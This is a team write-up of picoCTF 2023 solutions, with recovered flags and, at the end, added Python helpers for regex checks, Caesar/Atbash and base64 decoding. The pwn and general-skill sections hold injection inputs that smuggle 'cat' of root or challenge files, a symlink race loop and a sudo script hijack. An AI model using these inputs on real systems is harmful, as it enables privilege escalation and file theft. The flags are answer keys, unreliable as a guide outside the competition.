# picoCTF2023 writeup

###### tags: `Cyber`, `CCUISC`

> [name=Terry]
> [name=SKYSKY]
> [name=Sherry]
> [name=Calmtea5209]
> [name=小鹿]

Global student ranking:
![](https://i.imgur.com/XRaFP8z.png)

## Web

### MatchTheRegex

:::spoiler web
```html
<body>
  <h1 class="heading">PicoCTF</h1>
  <p></p>
  <div class="normal-form">
    <h2 id="sub-heading">Valid Input</h2>
    <form action="#" onsubmit="return send_request()">
      <input type="text" id="name" name="input" placeholder="Input text">
      <br>
      <br>
      <button id="submit-but" type="submit" id="submit-button">SUBMIT</button>
    </form>
  </div>
</body>
<script>
  function send_request() {
    let val = document.getElementById("name").value;
    // ^p.....F!?
    fetch(`/flag?input=${val}`)
      .then(res => res.text())
      .then(res => {
        const res_json = JSON.parse(res);
        alert(res_json.flag)
        return false;
      })
    return false;
  }
</script>
```
:::

With a bit of help from ChatGPT (lol).

The request path is `/flag?input=<whatever we type>`.

Regex: `^picoCTF\{[a-zA-Z0-9]+\}$`

`picoCTF{succ3ssfully_matchtheregex_08c310c6}`

### findme

Looking closely, logging in triggers redirects. Running `curl -v` against the two URLs turned up nothing, and we were stupidly stuck for a while; in the end we base64-decoded the two URLs.

`picoCTF{proxies_all_the_way_df44c94c}`

### More SQLi

Throw it into Burp Suite, take a look, and it's right there.

`picoCTF{G3tting_5QL_1nJ3c7I0N_l1k3_y0u_sh0ulD_e3e46aae}`

### SOAP

Throw it into Burp Suite. Clicking one of the Detail entries shows this:

![](https://i.imgur.com/NLirCfy.png)
![](https://i.imgur.com/AMcNHfP.png)

Following the [tutorial](https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files), the flag comes out.

`picoCTF{XML_3xtern@l_3nt1t1ty_e5f02dbf}`

## Crypto

### rotation

Caesar cipher, with "Maintain case" (keep the original upper/lower case).

`picoCTF{r0tat1on_d3crypt3d_fd5c4283}`

### ReadMyCert

- A CSR is an encoded text file used when requesting a certificate in a public-key system: it is the message an applicant sends to a certificate authority to apply for a digital certificate. It typically carries proof of identity (a digital signature) and the domain(s) the certificate will be used for (apex domain, subdomains, or a wildcard domain).
- openssl: `openssl req -in readmycert.csr -noout -text`

`picoCTF{read_mycert_60f83ace}`

### HideToSee

~~WinHex~~, ~~stegsolve~~, ~~binwalk~~ ⭕ [Steghide](https://linuxhint.com/steghide-beginners-tutorial/)

1. ![](https://i.imgur.com/ylF8Ml4.png)
2. Run encrypted.txt through an Atbash decoder.

`picoCTF{atbash_crack_1f84d779}`

## Reverse

### Reverse

```
strings ./reverse | grep "picoCTF"
```

`picoCTF{3lf_r3v3r5ing_succe55ful_d55531cd}`

### timer

After unzipping, running `strings` over the file gives the flag.

`picoCTF{t1m3r_r3v3rs3d_succ355fully_17496}`

### safe opener 2

Exactly the same approach as Reverse.

`picoCTF{SAf3_0p3n3rr_y0u_solv3d_it_6a2f371a}`

### Ready Gladiator 0

Typed random stuff and the flag popped out, lol. ~~Didn't even read the source code~~

![](https://i.imgur.com/d79z4ks.png)

`picoCTF{h3r0_t0_z3r0_4m1r1gh7_a7bf8a57}`

## pwn

### two-sum

Integer overflow.

`picoCTF{Tw0_Sum_Integer_Bu773R_0v3rfl0w_e0d38c85}`

### hijacking

`sudo -l` shows that /home/picoctf/.server.py can be run with sudo. Change its contents with vim; `:w!` writes the file directly. After that you can `chmod` the permissions to 777. The flag is in /home/challenge/metadata.json.

![](https://i.imgur.com/xmK2sJy.png)

`picoCTF{pYth0nn_libraryH!j@CK!n9_b5908c8d}`

### VNE

```
export SECRET_DIR="/root/flag.txt;cat /root/flag.txt"
./bin
```

Lol, that was a pure psychic guess.

`picoCTF{Power_t0_man!pul4t3_3nv_c183c127}`

### tic-tac

Race condition exploit. It does not succeed 100% of the time; you need several attempts to hit the race window.

```
echo public msg > public; echo flip test > flip
while true; do ln -sf flag.txt flip; ln -sf public flip ; done &
[2] 3000
for i in {1..100};do ./txtreader flip;done
```

`picoCTF{ToctoU_!s_3a5y_5748402c}`

## forensic

### PcapPoisoning

`picoCTF{P64P_4N4L7S1S_SU55355FUL_b151bc51}`

### hideme

binwalk

`picoCTF{Hiddinng_An_imag3within@n_ima9e_c0ea1bd4}`

### MSB

MSB steganography.

![](https://i.imgur.com/o6fn2zb.jpg)

Text content; the flag is inside.

`picoCTF{15_y0ur_que57_qu1x071c_0r_h3r01c_00e09493}`

### who is it

After `strings` you see an IP.

```
whois 173.249.33.206
```

`picoCTF{WilhelmZwalina}`

## General Skill

### Permission

Open /root/.flag.txt with vi.

`picoCTF{uS1ng_v1m_3dit0r_c2307ca8}`

### chrono

```
cat /challenge/flag.txt
```

`picoCTF{Sch3DUL7NG_T45K3_L1NUX_e441b7a9}`

### Special

It seems to only process the first few characters, so a longer payload does the job.

`lslslsls;cat ../../challenge/metadata.json`

~~How is this 300 points? scared.jpg~~

`picoCTF{5p311ch3ck_15_7h3_w0r57_d6a5ad81}`

### repetitions

Keep base64-decoding and it comes out.

`picoCTF{base64_n3st3d_dic0d!n8_d0wnl04d3d_dbc4340a}`

### Rules 2023

`picoCTF{h34rd_und3r5700d_4ck_cba1c711}`

### Specialer

The challenge bans a pile of commands, but `cd` plus tab completion reveals which files exist, and `echo $(<filename)` shows a file's contents.

```
cd ala
echo $(<kazam.txt)
```

`picoCTF{y0u_d0n7_4ppr3c1473_wh47_w3r3_d01ng_h3r3_c42168d9}`

### useless

:::spoiler Source after cat
```bash
#!/bin/bash
# Basic mathematical operations via command-line arguments

if [ $# != 3 ]
then
  echo "Read the code first"
else
  if [[ "$1" == "add" ]]
  then
    sum=$(( $2 + $3 ))
    echo "The Sum is: $sum"
  elif [[ "$1" == "sub" ]]
  then
    sub=$(( $2 - $3 ))
    echo "The Substract is: $sub"
  elif [[ "$1" == "div" ]]
  then
    div=$(( $2 / $3 ))
    echo "The quotient is: $div"
  elif [[ "$1" == "mul" ]]
  then
    mul=$(( $2 * $3 ))
    echo "The product is: $mul"
  else
    echo "Read the manual"
  fi
fi
```
:::

`man useless` gives the answer.

- [man](https://blog.gtwang.org/linux/linux-man-page-command-examples/): short for manual page, a documentation format; e.g. `man ls` prints how the ls command is used.

`picoCTF{us3l3ss_ch4ll3ng3_3xpl0it3d_7065}`
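Back to MatchTheRegex: the regex `^picoCTF\{[a-zA-Z0-9]+\}$` accepts any alphanumeric body, so a string like `picoCTF{abc123}` satisfies it even though the real flag (with underscores) would not. The following is an added example written for this writeup, not the challenge's server code, showing what that anchored pattern accepts and rejects in Python, and the one caveat a validator author should know: with `re.match`, `$` also matches just before a trailing newline, while `re.fullmatch` does not allow it. The sample inputs are constructed.

```python
import re

# The validation regex quoted in the MatchTheRegex section, unchanged.
FLAG_RE = re.compile(r"^picoCTF\{[a-zA-Z0-9]+\}$")


def matches_with_match(value: str) -> bool:
    """Anchored ^...$ via re.match: '$' is satisfied before a trailing '\\n' too."""
    return FLAG_RE.match(value) is not None


def matches_with_fullmatch(value: str) -> bool:
    """re.fullmatch: the entire string must be consumed, so a trailing '\\n' fails."""
    return FLAG_RE.fullmatch(value) is not None


def classify(values):
    """Map each input to (match_result, fullmatch_result) for side-by-side comparison."""
    return {v: (matches_with_match(v), matches_with_fullmatch(v)) for v in values}


# Constructed sample inputs (not challenge data).
SAMPLES = [
    "picoCTF{abc123}",      # alphanumeric body: accepted by both
    "picoCTF{abc123}\n",    # trailing newline: match() accepts, fullmatch() rejects
    "picoCTF{abc_123}",     # underscore is outside [a-zA-Z0-9]: rejected
    "picoCTF{}",            # empty body: '+' requires at least one character
    "xpicoCTF{abc123}",     # leading junk: blocked by the '^' anchor
]

if __name__ == "__main__":
    for value, verdict in classify(SAMPLES).items():
        print(repr(value), verdict)
```

The practical takeaway for anyone writing such a check is to prefer `fullmatch` (or an explicit `\A...\Z`) so the accepted set is exactly the one the pattern describes.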
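The rotation and HideToSee challenges above both come down to a case-preserving letter substitution: a Caesar shift (with "Maintain case") and Atbash respectively. The following added example, written for this writeup rather than taken from the challenge files, implements both, plus a brute force over the 26 shifts that picks the one producing a `picoCTF{` marker. The sample ciphertexts are constructed inside the block by encrypting a made-up flag.

```python
import string

LOWER = string.ascii_lowercase
UPPER = string.ascii_uppercase


def rotate(text: str, shift: int) -> str:
    """Caesar shift by `shift` positions; case is preserved and non-letters pass through."""
    out = []
    for ch in text:
        if ch in LOWER:
            out.append(LOWER[(LOWER.index(ch) + shift) % 26])
        elif ch in UPPER:
            out.append(UPPER[(UPPER.index(ch) + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


def atbash(text: str) -> str:
    """Atbash: a<->z, b<->y, ...; it is its own inverse and keeps case."""
    out = []
    for ch in text:
        if ch in LOWER:
            out.append(LOWER[25 - LOWER.index(ch)])
        elif ch in UPPER:
            out.append(UPPER[25 - UPPER.index(ch)])
        else:
            out.append(ch)
    return "".join(out)


def crack_rotation(ciphertext: str, marker: str = "picoCTF{"):
    """Try every shift; return (shift, plaintext) for the first candidate containing `marker`.

    Returns None when no shift works, which is what happens for a non-Caesar cipher
    such as Atbash: no single shift maps its output back to the marker.
    """
    for shift in range(26):
        candidate = rotate(ciphertext, -shift)
        if marker in candidate:
            return shift, candidate
    return None


# Constructed sample inputs (not the challenge files): a made-up flag encrypted here.
SAMPLE_PLAINTEXT = "picoCTF{constructed_example_0}"
SAMPLE_ROT = rotate(SAMPLE_PLAINTEXT, 7)    # Caesar, shift 7
SAMPLE_ATBASH = atbash(SAMPLE_PLAINTEXT)    # Atbash

if __name__ == "__main__":
    print(SAMPLE_ROT, "->", crack_rotation(SAMPLE_ROT))
    print(SAMPLE_ATBASH, "->", atbash(SAMPLE_ATBASH))
```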
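For repetitions, the writeup just says to keep base64-decoding. The following added example (written for this writeup, not the challenge's file) automates that: it peels layers until a `picoCTF{...}` pattern appears or the data stops being valid base64, and it tolerates line-wrapped input, which is the usual reason a naive `b64decode` with strict validation fails on a file produced by the `base64` CLI. The sample is constructed in the block by wrapping a made-up flag three times.

```python
import base64
import binascii
import re

FLAG_PATTERN = re.compile(rb"picoCTF\{[^}]*\}")


def _compact(data: bytes) -> bytes:
    """Drop all whitespace (line wrapping, trailing newline) before strict decoding."""
    return b"".join(data.split())


def encode_layers(data: bytes, layers: int) -> bytes:
    """Wrap `data` in `layers` rounds of base64; used only to build the constructed sample."""
    for _ in range(layers):
        data = base64.b64encode(data)
    return data


def peel_base64(blob: bytes, max_layers: int = 64):
    """Repeatedly base64-decode `blob`.

    Stops as soon as the flag pattern is visible, when the current data is not valid
    base64 (strict alphabet and padding checks), or after `max_layers` rounds.
    Returns (payload, layers_removed).
    """
    current = blob
    layers = 0
    while layers <= max_layers:
        if FLAG_PATTERN.search(current):
            return current, layers
        try:
            decoded = base64.b64decode(_compact(current), validate=True)
        except (binascii.Error, ValueError):
            break
        if not decoded:
            break
        current = decoded
        layers += 1
    return current, layers


# Constructed sample (not challenge data): a made-up flag wrapped three times.
SAMPLE = encode_layers(b"picoCTF{constructed_example_2}", 3)

if __name__ == "__main__":
    payload, depth = peel_base64(SAMPLE)
    print(depth, "layers ->", payload.decode())
```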